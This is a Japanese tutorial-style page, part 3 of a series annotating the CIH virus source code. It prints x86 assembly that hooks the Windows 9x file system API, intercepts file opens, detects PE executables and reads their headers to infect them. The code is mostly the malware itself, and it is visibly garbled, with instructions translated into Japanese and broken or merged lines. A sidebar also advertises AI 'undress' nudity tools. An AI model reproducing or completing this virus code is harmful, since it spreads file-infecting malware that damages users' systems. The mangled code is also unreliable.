コミュニティ
学ぶ
ツールライブラリ
AIツール
レジャー
検索
日本語
ホームページ バックエンド開発 PHPチュートリアル ウイルスプログラムのソースコード例の解析 - CIH ウイルス[3]

ウイルスプログラムのソースコード例の解析 - CIH ウイルス[3]

黄舟
黄舟
Jan 17, 2017 am 11:16 AM

jmp ExitRing0Init ;Exit Ring0レベル

;マージされたコードサイズ
CodeSizeOfMergeVirusCodeSection = offset $

;新しいIFSMgr_InstallFileSystemApiHook関数呼び出し
InstallFileSystemApiHook:
push ebx

call @4

@4:
pop ebx ; 現在のオフセットを取得します命令のアドレス
add ebx, FileSystemApiHook-@4 ; 差分とオフセットを加算した値は FileSystemApiHook のオフセットに等しい

push ebx
int 20h ; Vxd を呼び出して FileSystemApiHook を指すフックを削除する
IFSMgr_RemoveFileSystemApiHook = $
dd 00 0068h ;eax、ecx、edx、および flags レジスタを使用します
pop eax

; 元の IFSMgr_InstallFileSystemApiHook 関数を呼び出して FileSystemApiHook フックに接続します
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]

Pop ECX
プッシュeax
Push ebx

call OldInstallFileSystemApiHook-@3[ebx]
pop ecx

mov dr0, eax;OldFileSystemApiHook アドレスを調整

pop eax
pop ebx

ret

OldInstallFileSystemApiHook dd;元の InstallFileSystemApiHook 呼び出しアドレス

;IFSMgr_FileSystemHook callEntry
FileSystemApiHook:
@3 = FileSystemApiHook

push ad ;Save register

call @5

@5:
pop esi, offset ;esi は現在のコマンドのオフセット
add esi, VirusGameDataStartAddress - @5 ;esi は FileSystemApiHook のオフセットです
;;VirusGameDataStartAddress のオフセットの差は、VirusGameDataStartAddress のオフセットに等しいです

;「ビジー」フラグをテストすると、「ビジー」は pIFSFunc
テストバイト ptr (OnBusy- @6)[esi], 01h
jnz pIFSFunc

;ファイルが開かれていない場合はprevhookへ
lea ebx, [esp+20h+04h+04h] ;ebxはFunctionNumのアドレス

;呼び出し形式ファイルシステムのフックは次のとおりです
;FileSystemApiHookFunction(pIFSFunc FS DFnAddr , int FunctionNum, int Drive,
;int ResourceFlags, int CodePage, pioreq pir)

;この呼び出しがファイルを開くためのものであるかどうかを判断し、そうでない場合はジャンプします前のファイルへフック
cmp dword ptr [ebx], 00000024h
jne prevhook

inc byte ptr (OnBusy-@6)[esi] ; OnBusy フラグを「busy」に設定します

;ファイルパスで指定されたドライブ文字を指定して、そのドライブ名をFileNameBufferに入れます
;ドライブ文字が03hの場合は、そのドライブがCドライブであることを意味します
mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6 ;esi Points to FileNameBuffer

push esi ;Save
mov al, [ebx+04h] ;ebx+ 4 はディスク番号のアドレス

その場合は CallUniToBCSPath
cmp al に転送します。 , 0ffh
je CallUniToBCSPath

add al, 40h
mov ah, ':'

mov [esi] , eax ; 「char * pBCSPath, ParsedPath * pUniPath,
; unsigned int maxLength, int charSet」の形に処理)
CallUniToBCSPath:
Push 00000000h ; 文字セット
Push FileNameBufferSize ; 文字長
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
Push eax ;Uni 文字の先頭アドレス
puシエシ; BCS 文字の先頭アドレス
int 20h ;call UniToBCSPath
UniToBCSPath = $
dd 00400041h call id
add esp, 04h*04h

;ファイルが EXE ファイルかどうかを判断する
cmp [esi+eax-04h], 。」
jne DisableOnBusy

IF DEBUG

;以下の情報はデバッグ用です
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy ENDIF int 20h ; call IFSMgr_Ring0_FileIO Function
IFSMgr_Ring0_FileIO = $
dd 00400032h ;電話番号

jc DisableOnBusy
push ecx

;Get IFSMgr_Ring0_FileIO address
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]

;ファイルが読み取り専用かどうかを判断し、そうであれば変更しますファイル属性、それ以外の場合は OpenFile に移動します
Test cl, 01h
jz OpenFile mov ax, 4301h

OpenFile:
xor eax , eax
mov ah, 0d5h
xor ecx, ecx; ファイルを開く FileIO の関数

XCHG EBX, Eax; ファイルハンドルを EBX に保存する; ファイル属性を復元するかどうか (書き込み属性がある場合は復元する必要はありません)
Pop ecx
Pushf
test cl, 01h
jz ispileok

; mov ax, 4301h
call edi ;ファイル属性を復元する

;ファイルが正常に開かれたかどうか、DisableOnBusy
IsOpenFileOK:
popf
jc DisableOnBusy

;ファイルは正常に開かれました
push esi ;スタック上の最初のアドレス

pushf ;CF = 0, save flag bit

add esi, DataBuffer-@7; esi はデータ領域の最初のアドレスを指す

xor eax, eax
mov ah, 0d6h ;IFSMgr_Ring0_FileIO 読み込みファイル関数番号(R0_READFILE)

;ウイルスコードの長さを最小限に抑えるため、eaxをebpに保存
mov ebp, eax

push 00000004h ;4バイト読み込む
ポップecx
push ; グラフィックファイルヘッダのPEマークと感染マークを取得
edi​​にファイルを読み込む
そうであればさらに判定感染しているかどうかを判断します
; WinZip 自己解凍ファイルであるかどうかを判断します。感染している場合は、Self-Extractor に感染しません *
cmp dword ptr [esi], 00455000h; PE ファイルであるかどうかを判断します。 "PE/0/0")
jne CloseFile; そうでない場合は、ファイルを閉じます

; PE ファイルであり、感染していない場合は、ファイルの感染を開始します
push ebx; ファイルハンドルを保存します
push 00h

;ウイルス感染マークを設定します
push 01h;マークサイズ
push edx;edxはPEファイルヘッダを指します Offset 00h
push edi ;ediはIFSMgr_Ring0_FileIOのアドレスです

mov dr1, esp ; mov cl, SizeOfImageHeader ;読むために; 2バイトを読み込む場合
add edx, 07h; PEファイルヘッダー+07hはNumberOfSections(ブロック数)
call edi; read NumberOfSections(ブロック数) to esi
lea eax, (AddressOfEntryPoint-@8)[edx]
Push eax ;ファイルポインタ

lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ;バッファアドレス

;edxの値をファイルウイルスコードブロックテーブルの先頭に置く
movzx eax, word ptr( SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h] ;edxはウイルスコードブロックテーブルのオフセット

;ウイルスコードブロックテーブルのサイズを取得
mov al, SizeOfScetionTable;各ブロックtable アイテムのサイズ

mov cl, (NumberOfSections-@8)[esi]

mul cl ;各ブロックテーブルアイテムにブロック数を乗算したものがブロックテーブルのサイズに等しい

; code block table
lea esi, (StartOfSectionTable -@8)[esi] ;esi はブロックテーブル(ウイルス動的データ領域内)の先頭アドレスを指します

上記はウイルスプログラムのソースコード例解析の内容です-CIH ウイルス [3]。その他の関連コンテンツについては、PHP 中国語 Web サイト (www.php.cn) に注目してください。



このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

もっと見る

人気の記事

R.E.P.O.説明されたエネルギー結晶と彼らが何をするか(黄色のクリスタル)
4週間前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最高のグラフィック設定
4週間前 By 尊渡假赌尊渡假赌尊渡假赌
アサシンのクリードシャドウズ:シーシェルリドルソリューション
2週間前 By DDD
R.E.P.O.誰も聞こえない場合はオーディオを修正する方法
4週間前 By 尊渡假赌尊渡假赌尊渡假赌
WWE 2K25:Myriseのすべてのロックを解除する方法
1 か月前 By 尊渡假赌尊渡假赌尊渡假赌
もっと見る

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

もっと見る

ホットトピック

Gmailメールのログイン入り口はどこですか?
7514
15
CakePHP チュートリアル
1378
52
Steamのアカウント名の形式は何ですか
79
11
Win11 Activation Key Permanent
53
19
NYTの接続はヒントと回答です
19
64
もっと見る
Related knowledge
Alipay PHP SDK転送エラー:「クラスの看板を宣言できない」という問題を解決する方法は? Alipay PHP SDK転送エラー:「クラスの看板を宣言できない」という問題を解決する方法は? Apr 01, 2025 am 07:21 AM

Alipay Php ...

JSON Web Tokens(JWT)とPHP APIでのユースケースを説明してください。 JSON Web Tokens(JWT)とPHP APIでのユースケースを説明してください。 Apr 05, 2025 am 12:04 AM

JWTは、JSONに基づくオープン標準であり、主にアイデンティティ認証と情報交換のために、当事者間で情報を安全に送信するために使用されます。 1。JWTは、ヘッダー、ペイロード、署名の3つの部分で構成されています。 2。JWTの実用的な原則には、JWTの生成、JWTの検証、ペイロードの解析という3つのステップが含まれます。 3. PHPでの認証にJWTを使用する場合、JWTを生成および検証でき、ユーザーの役割と許可情報を高度な使用に含めることができます。 4.一般的なエラーには、署名検証障害、トークンの有効期限、およびペイロードが大きくなります。デバッグスキルには、デバッグツールの使用とロギングが含まれます。 5.パフォーマンスの最適化とベストプラクティスには、適切な署名アルゴリズムの使用、有効期間を合理的に設定することが含まれます。

PHPにおける後期静的結合の概念を説明します。 PHPにおける後期静的結合の概念を説明します。 Mar 21, 2025 pm 01:33 PM

記事では、PHP 5.3で導入されたPHPの後期静的結合(LSB)について説明し、より柔軟な継承を求める静的メソッドコールのランタイム解像度を可能にします。 LSBの実用的なアプリケーションと潜在的なパフォーマ

フレームワークセキュリティ機能:脆弱性から保護します。 フレームワークセキュリティ機能:脆弱性から保護します。 Mar 28, 2025 pm 05:11 PM

記事では、入力検証、認証、定期的な更新など、脆弱性から保護するためのフレームワークの重要なセキュリティ機能について説明します。

フレームワークのカスタマイズ/拡張:カスタム機能を追加する方法。 フレームワークのカスタマイズ/拡張:カスタム機能を追加する方法。 Mar 28, 2025 pm 05:12 PM

この記事では、フレームワークにカスタム機能を追加し、アーキテクチャの理解、拡張ポイントの識別、統合とデバッグのベストプラクティスに焦点を当てています。

PHPのCurlライブラリを使用してJSONデータを含むPOSTリクエストを送信する方法は? PHPのCurlライブラリを使用してJSONデータを含むPOSTリクエストを送信する方法は? Apr 01, 2025 pm 03:12 PM

PHP開発でPHPのCurlライブラリを使用してJSONデータを送信すると、外部APIと対話する必要があることがよくあります。一般的な方法の1つは、Curlライブラリを使用して投稿を送信することです。

確固たる原則と、それらがPHP開発にどのように適用されるかを説明してください。 確固たる原則と、それらがPHP開発にどのように適用されるかを説明してください。 Apr 03, 2025 am 12:04 AM

PHP開発における固体原理の適用には、次のものが含まれます。1。単一責任原則(SRP):各クラスは1つの機能のみを担当します。 2。オープンおよびクローズ原理(OCP):変更は、変更ではなく拡張によって達成されます。 3。Lischの代替原則(LSP):サブクラスは、プログラムの精度に影響を与えることなく、基本クラスを置き換えることができます。 4。インターフェイス分離原理(ISP):依存関係や未使用の方法を避けるために、細粒インターフェイスを使用します。 5。依存関係の反転原理(DIP):高レベルのモジュールと低レベルのモジュールは抽象化に依存し、依存関係噴射を通じて実装されます。

セッションのハイジャックはどのように機能し、どのようにPHPでそれを軽減できますか? セッションのハイジャックはどのように機能し、どのようにPHPでそれを軽減できますか? Apr 06, 2025 am 12:02 AM

セッションハイジャックは、次の手順で達成できます。1。セッションIDを取得します。2。セッションIDを使用します。3。セッションをアクティブに保ちます。 PHPでのセッションハイジャックを防ぐための方法には次のものが含まれます。1。セッション_regenerate_id()関数を使用して、セッションIDを再生します。2。データベースを介してストアセッションデータを3。

See all articles